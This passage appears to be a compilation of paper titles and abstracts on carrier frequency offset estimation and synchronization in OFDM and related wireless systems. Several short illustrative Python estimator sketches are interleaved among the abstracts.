Ratio (PICR) of OFDM signals. Based on this interpretation, we propose a simple approach to reduce the sensitivity of OFMA system to carrier frequency offset (CFO). The main idea is to choose a well understood code and to rotate each coordinate of the code by a fixed phase shift such that the maximum inter-carrier interference (ICI) taken over all sub-carriers is minimized. This approach enjoys the twin benefits of interference reduction and error correction and is easy to implement in practice. Simulation results show that a reduction of 7 dB can freely be obtained. --- paper_title: I/Q imbalance and CFO in OFDM/OQAM systems: Interference analysis and compensation paper_content: Offset-QAM (OQAM) based OFDM has been considered as a promising technique for future wireless networks due to its higher resilience to narrow-band interference and doubly dispersive channels. In this paper, we investigate the effects of the RX imperfections, namely the I/Q imbalance (IQI) and the carrier frequency offset (CFO), on OFDM/OQAM downlink performance coupled with the imperfect knowledge of the frequency-selective channel. 
The influence of each impairment is characterized by the interference analysis of the demodulated signal that reveals interesting insight into the distortion origination. Then, we analytically investigate the performance loss as a function of IQI, CFO and channel distortions in a realistic receiver with channel estimation error. To cope with impaired reception, a joint maximum-likelihood estimation method with repetitive training signals is employed. Simulation results demonstrate the relative sensitivity of OFDM/OQAM receivers to the impairments and that the performance loss due to the imperfections can be recovered by the compensation technique. --- paper_title: Inter-carrier interference-free Alamouti-coded OFDM for cooperative systems with frequency offsets in non-selective fading environments paper_content: A modified Alamouti-coded orthogonal frequency division multiplexing (OFDM) scheme is proposed for cooperative systems in non-selective fading environments. Even with the frequency offset between two distributed transmit antennas, the proposed scheme achieves ideal performance and full rate of Alamouti code. By switching subcarriers in the second OFDM symbol of each Alamouti-coded OFDM symbol pair after a simple-phase rotation in the first OFDM symbol, inter-carrier interference terms can be perfectly cancelled after a simple linear combining with the processing overhead of two times down-conversions and discrete Fourier transform (DFT) operations at each OFDM symbol. --- paper_title: Optimal Frequency Offsets with Doppler Spreads in Mobile OFDM System paper_content: In highly mobile OFDM systems, the carrier frequency offsets (CFO) with Doppler spreads for downlink detection can be considerably large, which degrades the frequency alignment for uplink transmission, particularly in employing directional antennas for inter-carrier interference (ICI) reduction. In prior works, the directional antenna was investigated with appropriate frequency alignment in receiver's local oscillator to efficiently reduce ICI in fast time varying OFDM systems. To resolve the optimal frequency offsets problem with Doppler spreads, this paper develops a simple scheme to capture instant Doppler power spectrum density (PSD) through moving directional antennas with arbitrary gain patterns. Thus, the optimal aligning frequency is derived as the center of gravity of the Doppler PSD. Simulations show our approach acquires the highest carrier to interference (C/I) ratio and the lowest bit error rates (BER) compared with other approaches. --- paper_title: Improving Range Accuracy of IEEE 802.15.4a Radios In the Presence of Clock Frequency Offsets paper_content: Two-way time-of-arrival (TW-ToA) is a ranging protocol that provides distance between two devices in absence of synchronization, but it suffers from range estimation errors when clock frequency offset is present. In this work, we provide a timing counter management scheme for TW-ToA that suppresses ranging errors induced by any clock frequency offset between a transmitter and receiver pair. The suggested scheme is shown to be superior both theoretically and empirically to the one that is recommended in the IEEE 802.15.4a standard. --- paper_title: Joint Carrier Frequency Offset and fast time-varying channel estimation for MIMO-OFDM systems paper_content: In this paper, a novel pilot-aided iterative algorithm is developed for MIMO-OFDM systems operating in fast time-varying environment. 
An L-path channel model with known path delays is considered to jointly estimate the multi-path Rayleigh channel complex gains and Carrier Frequency Offset (CFO). Each complex gain time-variation within one OFDM symbol is approximated by a Basis Expansion Model (BEM) representation. An auto-regressive (AR) model is built for the parameters to be estimated. The algorithm performs recursive estimation using Extended Kalman Filtering. Hence, the channel matrix is easily computed and the data symbol is estimated with free inter-sub-carrier-interference (ICI) when the channel matrix is QR-decomposed. It is shown that only one iteration is sufficient to approach the performance of the ideal case for which the knowledge of the channel response and CFO is available. --- paper_title: An Efficient Blind Estimation of Carrier Frequency Offset in OFDM Systems paper_content: In this paper, we propose a low-complexity blind carrier frequency offset (CFO) estimation scheme for constant modulus (CM)-signaling-based orthogonal frequency-division multiplexing (OFDM) systems. Provided that the channel can be assumed to be slowly time-varying, subcarriers having the same indexes in two consecutive OFDM symbols will experience nearly the same channel effect. This assumption enables us to derive a cost function that is determined by the sum of the products of the signal amplitudes on each pair of equivalent subcarriers from two successive OFDM symbols. The maximization process of this cost function makes it possible to find an appropriate estimate of the CFO. Over frequency-selective Rayleigh fading channels, the proposed CFO estimation method provides improved performance over existing techniques. Moreover, in the context of narrow-band noise and signal gain variations, the simulations demonstrate the robustness and immunity of our scheme. --- paper_title: Training-Based Synchronization and Channel Estimation in AF Two-Way Relaying Networks paper_content: Two-way relaying networks (TWRNs) allow for more bandwidth efficient use of the available spectrum since they allow for simultaneous information exchange between two users with the assistance of an intermediate relay node. However, due to superposition of signals at the relay node, the received signal at the user terminals is affected by multiple impairments, i.e., channel gains, timing offsets, and carrier frequency offsets, that need to be jointly estimated and compensated. This paper presents a training-based system model for amplify-and-forward (AF) TWRNs in the presence of multiple impairments and proposes maximum likelihood and differential evolution based algorithms for joint estimation of these impairments. The Cramer-Rao lower bounds (CRLBs) for the joint estimation of multiple impairments are derived. A minimum mean-square error based receiver is then proposed to compensate the effect of multiple impairments and decode each user's signal. Simulation results show that the performance of the proposed estimators is very close to the derived CRLBs at moderate-to-high signal-to-noise-ratios. It is also shown that the bit-error rate performance of the overall AF TWRN is close to a TWRN that is based on assumption of perfect knowledge of the synchronization parameters. 
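Since this survey is concerned with Kalman-type estimators, a minimal extended Kalman filter sketch for tracking a CFO-induced phase ramp from known pilots is given below. It is my own toy construction under assumed state and noise models (constant-modulus pilots, a two-element phase/frequency state, and arbitrarily chosen noise levels) and is not the EKF algorithm of the MIMO-OFDM paper cited above.

```python
import numpy as np

def ekf_cfo_track(y, pilots, q_freq=1e-6, r_var=0.01):
    """Track state x = [phase, freq] from y[k] = pilots[k]*exp(j*phase[k]) + noise."""
    F = np.array([[1.0, 1.0], [0.0, 1.0]])       # phase integrates the frequency
    Q = np.diag([1e-8, q_freq])                  # assumed process noise
    R = np.eye(2) * r_var / 2                    # measurement noise per real axis
    x, P = np.zeros(2), np.eye(2)
    freq = []
    for yk, pk in zip(y, pilots):
        x = F @ x                                # predict
        P = F @ P @ F.T + Q
        s = pk * np.exp(1j * x[0])               # predicted measurement
        H = np.array([[-s.imag, 0.0],            # Jacobian of [Re(s), Im(s)]
                      [s.real, 0.0]])            # with respect to [phase, freq]
        innov = np.array([yk.real - s.real, yk.imag - s.imag])
        K = P @ H.T @ np.linalg.inv(H @ P @ H.T + R)
        x = x + K @ innov                        # update
        P = (np.eye(2) - K @ H) @ P
        freq.append(x[1])
    return np.array(freq)

# Toy usage: constant-modulus pilots rotated by 0.02 rad/sample plus noise.
rng = np.random.default_rng(5)
n = np.arange(400)
pilots = np.ones(400, dtype=complex)
y = pilots * np.exp(1j * 0.02 * n)
y += np.sqrt(0.01 / 2) * (rng.standard_normal(400) + 1j * rng.standard_normal(400))
print(round(ekf_cfo_track(y, pilots)[-1], 3))    # settles near 0.02
```

The same predict/linearize/update pattern extends to the joint channel-gain and CFO state vectors used by the recursive estimators surveyed in this document; only the state dimension and the measurement Jacobian grow.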
--- paper_title: Sequence Designs for Robust Consistent Frequency-Offset Estimation in OFDM Systems paper_content: In this paper, we derive the average pairwise error probability (PEP) of an integer carrier frequency-offset (CFO) estimator with consistent pilots in orthogonal frequency-division multiplexing (OFDM) systems and address several issues based on PEP analysis. In particular, the relationship between the PEP and consistent pilots is established in terms of a diversity gain and a shift gain. Based on the observations, we present new criteria for sequence designs. Simulation results show that the sequence developed from these criteria yields much reduced outliers compared with conventional sequences for consistent CFO estimation in frequency-selective fading channels. --- paper_title: Efficient Sequential Integer CFO and Sector Identity Detection for LTE Cell Search paper_content: In this letter, we propose an efficient algorithm for the detection of the integer carrier frequency offset (CFO) and sector identity used in the LTE cell search. For the conventional LTE cell search, the integer CFO and sector identity are jointly detected by utilizing the primary synchronization signal (PSS). By exploiting the symmetric property of the PSS, the integer CFO can be solely detected without the knowledge of sector identity, and thus, the joint detection of the integer CFO and sector identity is decoupled. Additionally, the proposed sequential integer CFO and sector identity detection (SISID) removes the effect of the channel frequency responses such that the detection accuracy is enhanced. We also design the SISID hardware architecture where the parts of the signals are processed in the polar coordinate so that all the multiplications are realized by additions/subtractions. The simulation results demonstrate that the proposed SISID achieves better detection accuracy than the conventional methods with only one third of the computational complexity. --- paper_title: Digital Baseband IC Design of OFDM PHY for a 60GHz Proximity Communication System paper_content: This paper presents a digital baseband IC design based on OFDM PHY for a 60GHz proximity communication system. We propose a low computational complexity OFDM demodulator with a carrier frequency offset estimation method in polar coordinates suitable for high-speed parallel architecture. The proposed architecture is implemented in 65nm CMOS technology, and is experimentally verified to achieve the PHY data rate above 2.2Gbps. The digital baseband IC includes a complete functionality of OFDM transceiver with error correcting codecs and MAC. --- paper_title: Performance Improvement of MDPSK Signal Reception in the Presence of Carrier Frequency Offset paper_content: Performance of mobile systems is significantly influenced by the carrier frequency offset caused by a Doppler shift, which leads to deployment of differential modulation schemes instead of coherent detection-based schemes. In this paper, we propose a novel M-ary differential phase-shift keying (MDPSK) receiver that performs better than the receiver with MDPSK differential detection and is very close to the performance of a coherent MDPSK detector. The symbol error probability of the proposed MDPSK receiver is approximately constant within the practical frequency offset range. The proposed receiver may be used in the systems that work in fading and with high-frequency offset environments. 
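As a generic companion to the integer-CFO entries above, the sketch below recovers an integer CFO by testing which cyclic shift of a known pilot best matches the received spectrum. This is the textbook cyclic-shift correlation test, not the cited SISID algorithm, and the pilot construction and search range are assumptions made only for illustration.

```python
import numpy as np

def detect_integer_cfo(Y, pilot, search):
    """Return the shift g in `search` maximizing |<roll(pilot, g), Y>|;
    an integer CFO of g subcarriers cyclically shifts the pilot spectrum by g bins."""
    scores = [np.abs(np.vdot(np.roll(pilot, g), Y)) for g in search]
    return search[int(np.argmax(scores))]

# Toy usage: an integer CFO of +3 subcarriers applied in the time domain.
rng = np.random.default_rng(6)
N = 64
pilot = np.exp(1j * np.pi / 2 * rng.integers(0, 4, N))       # QPSK-like pilot
x = np.fft.ifft(pilot)
rx = x * np.exp(1j * 2 * np.pi * 3 * np.arange(N) / N)
Y = np.fft.fft(rx)
print(detect_integer_cfo(Y, pilot, list(range(-8, 9))))      # prints 3
```

Replacing the brute-force shift search with structure in the pilot, for example the symmetry exploited by the LTE PSS, is what allows the low-complexity detectors described above to avoid evaluating every hypothesis explicitly.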
--- paper_title: Iterative Sampling Frequency Offset Estimation for MB-OFDM UWB Systems With Long Transmission Packet paper_content: A multiband orthogonal frequency-division multiplexing (MB-OFDM) system, which is one of the effective modulation techniques that have been adopted for high-speed ultrawideband (UWB) systems, is very sensitive to sampling frequency offset (SFO) due to the mismatch between local oscillators at the transmitter and the receiver. In this paper, we propose an iterative SFO estimation method for a high-data-rate MB-OFDM UWB system to improve its SFO estimation accuracy in the case of a long transmission packet. The proposed method is an iterative process of 2-D SFO estimation across pilot subcarriers and consecutive OFDM symbols, together with joint channel estimation. Furthermore, we derive the Cramer-Rao lower bound (CRLB) for the proposed SFO estimation method. This CRLB can be used as a guide for algorithm design and to explore the theoretical limit. Our performance analysis and simulation results show that the proposed iterative SFO estimation method is both practical and effective. --- paper_title: A Blind Fine Synchronization Scheme for SC-FDE Systems paper_content: This work presents a blind fine synchronization scheme, which estimates and compensates residual carrier-frequency offset (RCFO) and symbol timing offset (STO) , for single-carrier frequency-domain equalization (SC-FDE) systems. Existing fine synchronization schemes for SC-FDE systems rely on time-domain unique words (UW) sequences as reference signals to assure the estimation accuracy, at the cost of decreased system throughput. The proposed technique, named simplified weighted least-square method for single-carrier systems (SWLS-SC), combines the decision feedback structure and SWLS estimator for OFDM systems. Together with specifically derived weighting factors, it has much better estimation accuracy than the well-known linear least-square (LLS) method for SC-FDE systems, and its BER performance can approach that of the ideal synchronization condition. The proposed technique is more effective than existing techniques, in terms of both performance and throughput. Theoretical estimation bounds are also derived to verify the effectiveness of the proposed method. --- paper_title: Optimizing Wideband Cyclostationary Spectrum Sensing Under Receiver Impairments paper_content: In the context of Cognitive Radios (CRs), cyclostationary detection of primary users (PUs) is regarded as a common method for spectrum sensing. Cyclostationary detectors rely on the knowledge of the signal's symbol rate, carrier frequency, and modulation class in order to detect the present cyclic features. Cyclic frequency and sampling clock offsets are the two receiver impairments considered in this work. Cyclic frequency offsets, which occur due to oscillator frequency offsets, Doppler shifts, or imperfect knowledge of the cyclic frequencies, result in computing the test statistic at an offset from the true cyclic frequency. In this paper, we analyze the effect of cyclic frequency offsets on conventional cyclostationary detection, and propose a new multi-frame test statistic that reduces the degradation due to cyclic frequency offsets. Due to the multi-frame processing of the proposed statistic, non-coherent integration might occur across frames. 
Through an optimization framework developed in this work, which can be performed offline, we determine the best frame length that maximizes the average detection performance of the proposed cyclostationary detection method given the statistical distributions of the receiver impairments. As a result of the optimization, the proposed detector is shown to achieve performance gains over conventional detectors under a constrained sensing time. We derive the proposed detector's theoretical average detection performance, and compare it to the performance of the conventional cyclostationary detector. Our analysis shows that gains in average detection performance using the proposed method can be achieved when the effect of sampling clock offset is less severe than that of the cyclic frequency offset. The analysis given in this paper can be used as a design guideline for practical implementation of cyclostationary spectrum sensors. --- paper_title: Low-complexity pilot-aided compensation for carrier frequency offset and I/Q imbalance paper_content: We propose a novel pilot-aided compensation scheme for carrier frequency offset (CFO) and I/Q imbalance. The proposed scheme comprises a generalized periodic pilot and a low-complexity acquisition algorithm, where the CFO and the coefficients for I/Q imbalance compensation can be obtained in explicit closed form. --- paper_title: Towards practical channel reciprocity exploitation: Relative calibration in the presence of frequency offset paper_content: Relative calibration has been proposed as a simple way to practically exploit the reciprocity of the wireless channel. It is based on a simple convolutional model for the relationship between the channel impulse responses in both directions, and accounts for the discrepancies between transmit and receive radiofrequency components, without the need for specific calibration hardware. However, the relative calibration methods developed so far have been shown to lack robustness with respect to frequency offset between the devices on both sides of the considered channel. In this article, we introduce a relative calibration algorithm that properly deals with the presence of frequency offset. We verify its robustness and assess its performance through simulations, and validate the proposed model experimentally on measured channels. --- paper_title: Blind Channel Shortening for Asynchronous SC-IFDMA Systems with CFOs paper_content: This paper proposes a blind channel shortening algorithm for uplink reception of a single-carrier interleaved frequency-division multiple-access (SC-IFDMA) system transmitting over a highly dispersive channel, which is affected by both timing offsets (TOs) and frequency offsets (CFOs). When the length of the cyclic prefix (CP) is insufficient to compensate for channel dispersion and TOs, a common strategy is to shorten the channel by means of time-domain equalization, in order to restore CP properties and ease signal reception.
The proposed receiver exhibits a three-stage structure: the first stage performs blind shortening of all the user channel impulse responses (CIRs) by adopting the minimum mean-output energy criterion, requiring neither a priori knowledge of the CIRs to be shortened nor preliminary compensation of the CFOs; the second stage performs joint compensation of the CFOs; finally, to alleviate noise amplification effects possibly arising from CFO compensation, the third stage implements per-user signal-to-noise ratio (SNR) maximization, without requiring knowledge of the shortened CIRs. A theoretical analysis is carried out to assess the effectiveness of the proposed shortening algorithm in the high-SNR regime; moreover, the performance of the overall receiver is validated and compared with that of existing methods by extensive Monte Carlo computer simulations. --- paper_title: Joint Low-Complexity Equalization and Carrier Frequency Offsets Compensation Scheme for MIMO SC-FDMA Systems paper_content: Due to their noise amplification, conventional Zero-Forcing (ZF) equalizers are not suited for interference-limited environments such as Single-Carrier Frequency Division Multiple Access (SC-FDMA) in the presence of Carrier-Frequency Offsets (CFOs). Moreover, they suffer from increasing complexity with the number of subcarriers and in particular with Multiple-Input Multiple-Output (MIMO) systems. In this letter, we propose a Joint Low-Complexity Regularized ZF (JLRZF) equalizer for MIMO SC-FDMA systems to cope with these problems. The main objective of this equalizer is to avoid the direct matrix inversion by performing it in two steps to reduce the complexity. We add a regularization term in the second step to avoid the noise amplification. From the obtained simulation results, the proposed scheme is able to enhance the system performance with lower complexity and sufficient robustness to estimation errors. --- paper_title: A Scheme to Support Concurrent Transmissions in OFDMA Based Ad Hoc Networks paper_content: In this paper, we propose a novel system architecture to realize OFDMA in ad hoc networks. A partial time synchronization strategy is presented based on the proposed system model. This proposed scheme can support concurrent transmission without global clock synchronization. We also propose a null-subcarrier-based frequency synchronization scheme to estimate and compensate frequency offsets in a multiple-user environment. The simulation results show a good performance of our proposed synchronization scheme in terms of frequency offset estimation error and variance. --- paper_title: Low-Complexity Cell Search With Fast PSS Identification in LTE paper_content: Cell search and synchronization in the Third-Generation Partnership Project (3GPP) Long-Term Evolution (LTE) system is performed in each user equipment (UE) by using the primary synchronization signal (PSS) and secondary synchronization signal (SSS). The overall synchronization performance is heavily dominated by robust PSS detection, which can be achieved in the conventional noncoherent detector by exploiting the near-perfect autocorrelation and cross-correlation properties of Zadoff-Chu (ZC) sequences. However, a relatively high computational complexity is observed in conventional algorithms.
As compared with them, two new detectors, i.e., the almost-half-complexity (AHC) and central-self-correlation (CSC) detectors, are proposed in this paper to achieve reliable PSS detection with much lower complexity by exploiting the central-symmetric property of ZC sequences. The complexity of the proposed CSC detector is only 50% of that of the AHC detector, which itself achieves exactly the same PSS detection accuracy as the conventional detector while saving half of its complexity. An improvement of CSC, i.e., CSCIns, is also proposed in this paper to combat large frequency offsets. The performance of the CSCIns detector is independent of the frequency offset, and numerical results show that the 90% PSS acquisition time of CSCIns can be well within an 80-ms duration, even in a heavy intercell-interference environment with a signal-to-noise ratio (SNR) of -10 dB. --- paper_title: Iterative Blind OFDM Parameter Estimation and Synchronization for Cognitive Radio Systems paper_content: An iterative design method for Orthogonal Frequency Division Multiplexing (OFDM) system parameter estimation and synchronization under a blind scenario for cognitive radio systems is proposed in this paper. A novel envelope-spectrum-based arbitrary oversampling ratio estimator is presented first, based on which algorithms are then developed to provide the identification of other OFDM parameters (number of subcarriers, cyclic prefix (CP) length). Carrier frequency offset (CFO) and timing offset are estimated for the purpose of synchronization with the help of the identified parameters. An iterative scheme is employed to increase the estimation accuracy. To validate the proposed design, the performance is evaluated under an experimental propagation environment and the results show that the proposed design is capable of performing blind parameter estimation and synchronization for cognitive radio with improved performance. --- paper_title: Semi-analytic selection of sub-carrier allocation schemes in uplink orthogonal frequency division multiple access paper_content: The authors propose a generalised framework that analytically compares different sub-carrier allocation (SA) or sub-channelisation schemes (such as interleaved SA (ISA), localised SA (LSA) or hybrid schemes) in uplink (UL) orthogonal frequency division multiple access (OFDMA). The ultimate goal of the proposed framework is to systematically determine the best SA scheme among the considered candidates for a given condition of inter-user frequency offsets (IUFOs) and the target bit error rate (BER). As an illustration, two typical SA schemes are considered, that is, ISA and LSA, for comparison. First, based on the well-known fact that the multiple access interference caused by IUFO and the frequency diversity gain are both dictated by the employed SA scheme, the authors propose a semi-analytic approach to derive a coded BER curve formula as a function of the frequency offset bound (FOB) for each scheme. Then, the signal-to-noise ratio gain of ISA over LSA for various target BERs and FOBs is derived. Finally, the cutoff FOB beyond which ISA performs worse than LSA is obtained and its functional relationship with the target BER is investigated. By following the overall procedure in the proposed framework, the best SA scheme among the various SA candidates for general UL OFDMA systems with arbitrary system parameters can be chosen.
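The blind parameter-estimation entry above identifies the number of subcarriers and the cyclic-prefix length without pilots. A common ingredient of such schemes, sketched below under the assumption of a plain CP-OFDM signal, is that the cyclic prefix makes samples separated by exactly the FFT length correlated, so a peak of the lag-domain autocorrelation reveals the useful symbol length. The envelope-spectrum oversampling estimator of the cited paper is not reproduced, and all numerology in the demo is an illustrative assumption.

```python
import numpy as np

def estimate_fft_size(rx, candidate_lags):
    """Return the candidate lag with the strongest normalized autocorrelation.

    For a CP-OFDM signal, rx[n] and rx[n + N_fft] are equal (up to noise and
    channel) during every cyclic prefix, so the correct N_fft shows up as a
    clear peak among the candidate lags."""
    scores = {}
    for d in candidate_lags:
        num = np.abs(np.sum(rx[:-d] * np.conj(rx[d:])))
        den = np.sqrt(np.sum(np.abs(rx[:-d]) ** 2) * np.sum(np.abs(rx[d:]) ** 2))
        scores[d] = num / den
    return max(scores, key=scores.get), scores

# Usage on a synthetic stream of CP-OFDM symbols (illustrative parameters)
rng = np.random.default_rng(2)
N_fft, N_cp, n_sym = 128, 16, 40
syms = []
for _ in range(n_sym):
    X = (rng.integers(0, 2, N_fft) * 2 - 1) + 1j * (rng.integers(0, 2, N_fft) * 2 - 1)
    x = np.fft.ifft(X)
    syms.append(np.concatenate([x[-N_cp:], x]))        # prepend cyclic prefix
rx = np.concatenate(syms)
rx += 0.02 * (rng.standard_normal(rx.size) + 1j * rng.standard_normal(rx.size))
best, _ = estimate_fft_size(rx, candidate_lags=[64, 128, 256, 512])
print("estimated FFT size:", best)
```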
--- paper_title: Iterative Frequency Domain Equalization and Carrier Synchronization for Multi-Resolution Constellations paper_content: Broadband broadcast and multicast wireless systems usually employ OFDM modulations (Orthogonal Frequency Division Multiplexing) combined with non-uniform hierarchical constellations. However, these schemes are very prone to nonlinear distortion effects and have high carrier synchronization requirements. SC-FDE (Single-Carrier with Frequency-Domain Equalization) is an attractive alternative for OFDM, especially when an efficient power amplification is intended. In this paper we consider the use of SC-FDE schemes combined with non-uniform hierarchical constellations in broadband broadcast and multicast wireless systems. We study the impact of residual CFO (Carrier Frequency Offset) on the performance of multi-resolution schemes and we propose iterative frequency domain receivers with joint detection and carrier synchronization to cope with residual CFO estimation errors (a coarse CFO estimation and compensation is assumed before the equalization procedure). Our results show that while a very high carrier synchronization accuracy is required for the least protected bits, the most protected bits are relatively robust to the CFO. By employing the proposed receiver we increase significantly the robustness to residual CFO estimation errors. --- paper_title: Iterative Synchronization-Assisted Detection of OFDM Signals in Cognitive Radio Systems paper_content: Despite many attractive features of an orthogonal frequency-division multiplexing (OFDM) system, the signal detection in an OFDM system over multipath fading channels remains a challenging issue, particularly in a relatively low signal-to-noise ratio (SNR) scenario. This paper presents an iterative synchronization-assisted OFDM signal detection scheme for cognitive radio (CR) applications over multipath channels in low-SNR regions. To detect an OFDM signal, a log-likelihood ratio (LLR) test is employed without additional pilot symbols using a cyclic prefix (CP). Analytical results indicate that the LLR of received samples at a low SNR can be approximated by their log-likelihood (LL) functions, thus allowing us to estimate synchronization parameters for signal detection. The LL function is complex and depends on various parameters, including correlation coefficient, carrier frequency offset (CFO), symbol timing offset, and channel length. Decomposing a synchronization problem into several relatively simple parameter estimation subproblems eliminates a multidimensional grid search. An iterative scheme is also devised to implement a synchronization process. Simulation results confirm the effectiveness of the proposed detector. --- paper_title: Feedback Generation for CoMP Transmission in Unsynchronized Networks with Timing Offset paper_content: Coordinated multipoint (CoMP) transmission is a promising technique in long term evolution (LTE) systems to provide coverage and broadband communication for cell edge user equipments (UEs). However, as signals from multiple transmitters may reach the UE at different times, CoMP networks might experience high time offsets, leading to significant performance loss in closed-loop transmission. In this paper we show that spacing between reference signals (RSs) imposes a phase offset on the transmit covariance matrix in presence of timing offset (TO), affecting the feedback generation. 
The promised advantages of closed-loop CoMP transmission vanish in presence of TO due to improper precoding matrix index (PMI) selection. Keeping the phase shift close to zero, reliable PMI selection can be guaranteed and as a result near optimum performance is achieved for closed-loop CoMP transmission in unsynchronized networks with TO present. --- paper_title: Analysis of carrier frequency offset estimation with multiple pilot block sequences paper_content: As is well known, dividing the pilot symbols into multiple blocks and separating these blocks at some distances away from each other can significantly improve the frequency estimation accuracy. However, the mean square error (MSE) performance at moderate and low SNR, especially the SNR threshold effect, with multiple pilot block sequences has not been investigated properly. Thus, a numerical calculation method is proposed in this paper to derive the approximate MSE of the ML estimator with multiple pilot block sequences at all SNRs and the proposed calculation method obtains the MSEs coinciding with the simulation results and the calculated approximate MSEs can tell exactly where the SNR thresholds are. --- paper_title: Joint Frequency Synchronization and Spectrum Occupancy Characterization in OFDM-Based Cognitive Radio Systems paper_content: OFDM-based cognitive radio (CR) systems are shown to be an effective solution for increasing spectrum efficiency by activating the certain group of subcarriers (subbands) in locally available spectrum. However, each CR receiver should synchronize itself to appropriate carrier frequency and to identify currently activated subbands. Moreover, energy and bandwidth efficiency of CR systems can be improved if each CR could provide additional characterization of the local spectral content. In this paper a novel joint frequency synchronization and spectrum occupancy characterization method for OFDM-based CR systems is proposed. The synchronization preamble structure is appropriately modified in order to efficiently perform frequency offset estimation, to identify occupied subbands, and, finally, to provide SNR and interference power estimates as reliable quantitative indicators of spectrum occupancy. The performance of proposed method is evaluated for different amounts of spectrum occupancy and interference levels. --- paper_title: An Eigenvalue Based Carrier Frequency Offset Estimator for OFDM Systems paper_content: Orthogonal frequency division multiplexing (OFDM) is sensitive to frequency synchronization errors. This letter proposes a novel data-aided carrier frequency offset (CFO) estimator. We show that the eigenvalues of the inter-carrier interference (ICI) coefficient matrix are the elements of a geometric series distributed on the unit circle of the complex plane. Then, we prove that estimating the CFO is equivalent to finding the eigenvalues of a two-dimensional ICI coefficient matrix. As a result, by transmitting the corresponding eigenvectors, an estimate of the CFO value can be found. In addition to its simplicity, the proposed estimator is proven to be a maximum likelihood estimator. Simulation results are presented to demonstrate the high accuracy of the proposed estimator in presence of channel noise and fading. 
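The multiple-pilot-block entry above analyses the MSE and SNR-threshold behaviour of the maximum-likelihood CFO estimator. As a reference point only, the sketch below implements the textbook form of that estimator for an AWGN-type model: correlate the received samples with the known pilot at trial frequencies and pick the frequency that maximizes the correlation magnitude, where the pilot may occupy several separated blocks. The block lengths, spacing, and grid are assumed values, and the paper's numerical MSE-calculation method is not reproduced.

```python
import numpy as np

def ml_cfo_estimate(r, pilot, pilot_idx, freqs):
    """Grid-search ML CFO estimate (cycles/sample) for the model
    r[n] = pilot * exp(j*2*pi*f*n) + noise, observed only at the sample
    indices in pilot_idx (possibly several separated pilot blocks)."""
    n = np.asarray(pilot_idx)
    best_f, best_val = None, -np.inf
    for f in freqs:
        val = np.abs(np.sum(r[n] * np.conj(pilot) * np.exp(-1j * 2 * np.pi * f * n)))
        if val > best_val:
            best_f, best_val = f, val
    return best_f

# Usage: two pilot blocks of 32 samples with a gap in between (assumed layout)
rng = np.random.default_rng(3)
idx = np.concatenate([np.arange(32), 96 + np.arange(32)])
pilot = np.exp(1j * 2 * np.pi * rng.random(idx.size))
f_true = 1.7e-3
r = np.zeros(160, dtype=complex)
r[idx] = pilot * np.exp(1j * 2 * np.pi * f_true * idx)
r += 0.1 * (rng.standard_normal(160) + 1j * rng.standard_normal(160))
freqs = np.linspace(-5e-3, 5e-3, 2001)
print(ml_cfo_estimate(r, pilot, idx, freqs))           # close to 1.7e-3
```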
--- paper_title: An efficient synchronization signal structure for OFDM-based cellular systems paper_content: OFDM has been a widely accepted technology in high rate and multimedia data service systems such as long term evolution (LTE) in the 3rd generation partnership project (3GPP). In this paper, we investigate a synchronization signal structure and corresponding cell search algorithm in the LTE system where two, primary and secondary synchronization signals are employed. We focus on the secondary synchronization signal which possesses two layered scrambling sequences in addition to basic sequences. These scrambling sequences minimize performance degradation in cell search, but incur a high complexity to a mobile station receiver. In this paper, we propose a new secondary synchronization signal structure which does not require additional scrambling sequences while maintaining almost the same performance as the current LTE scheme. We evaluate the performance of the proposed scheme under various channel environments by examining the impacts of multipath fading, frequency offset, and vehicular speed. We also compare the complexity of the proposed scheme with the LTE scheme. --- paper_title: Low-Complexity Iterative Carrier Frequency Offset Estimation with ICI Elimination for OFDM Systems paper_content: In OFDM systems, carrier frequency offset (CFO) between the transmitter and the receiver destroys the orthogonality among subcarriers and induces strong inter-carrier interference (ICI). For the CFO estimation schemes based on frequency-domain pilot signals, the estimation performance is degraded and bounded by the ICI. In this work we propose a novel CFO estimation scheme - PTA-based with ICI elimination (PTA-IE), to improve the CFO estimation performance. By applying an iterative process, the CFO estimation performance can be progressively enhanced, attaining the best achievable performance without ICI. Our proposed scheme can benefit not only the CFO estimation performance but also the demodulation performance on data subcarriers. Moreover, the proposed scheme has low computational complexity without the need of matrix inversion. --- paper_title: Efficient carrier frequency offset estimation for orthogonal frequency-division multiple access uplink with an arbitrary number of subscriber stations paper_content: An efficient method is proposed to estimate the carrier frequency offsets (CFOs) in the orthogonal frequency-division multiple access (OFDMA) uplink. The conventional alternating projection method is accelerated by utilising the inherited properties of the matrices involved. The multiplication of large sparse projection matrices can be elegantly transformed to a series of products involving small dense matrices, and the inverse operation of these large matrices can be substituted by direct computations. Hence, the computational cost is significantly reduced without compromising the accuracy of the CFO estimation. --- paper_title: Signal Design for Reduced Complexity and Accurate Cell Search/Synchronization in OFDM-Based Cellular Systems paper_content: This paper proposes a variant of the frequency-domain synchronization structure specified in the long-term evolution (LTE) standard. In the proposed scheme, the primary synchronization signal used in step-1 cell search is the concatenation of a Zadoff-Chu (ZC) sequence and its conjugate (as opposed to only the ZC sequence in LTE). 
For step-2 cell search, we propose a complex scrambling sequence requiring no descrambling and a new remapped short secondary synchronization signal that randomizes the intercell interference (as opposed to the first/second scrambling sequence and swapped short signals in LTE). Through a combination of analysis and simulation, we demonstrate that the proposed synchronization signals lead to lower searcher complexity than LTE, a lower detection error rate, a shorter mean cell search time, and immunity toward a frequency offset. --- paper_title: Network-Wide Distributed Carrier Frequency Offsets Estimation and Compensation via Belief Propagation paper_content: In this paper, we propose a fully distributed algorithm for frequency offset estimation in decentralized systems. With the proposed algorithm, each node estimates its frequency offsets by local computations and limited exchange of information with its direct neighbors. Such an algorithm does not require any centralized information processing or knowledge of the global network topology. It is shown analytically that the proposed algorithm always converges to the optimal estimates regardless of network topology. Simulation results demonstrate the fast convergence of the algorithm and show that the estimation mean-squared error at each node reaches the centralized Cramer-Rao bound within a few iterations of message exchange. Therefore, the proposed method has low overhead and is scalable with network size. --- paper_title: Implementation and Co-Simulation of Hybrid Pilot-Aided Channel Estimation With Decision Feedback Equalizer for OFDM Systems paper_content: This paper introduces a novel hybrid pilot-aided channel estimation with decision feedback equalizer (DFE) for OFDM systems and its corresponding hardware co-simulation platform. This pilot-aided channel estimation algorithm consists of two parts: coarse estimation and fine estimation. In the coarse estimation, combined classical channel estimation methods including carrier frequency offset (CFO) and channel impulse response (CIR) estimation are used. Based on the received training sequence and pilot tones in the frequency domain, the major CFO, sampling clock frequency offset (SFO) and CIR effect coefficients are derived. In the fine estimation, pilot-aided polynomial 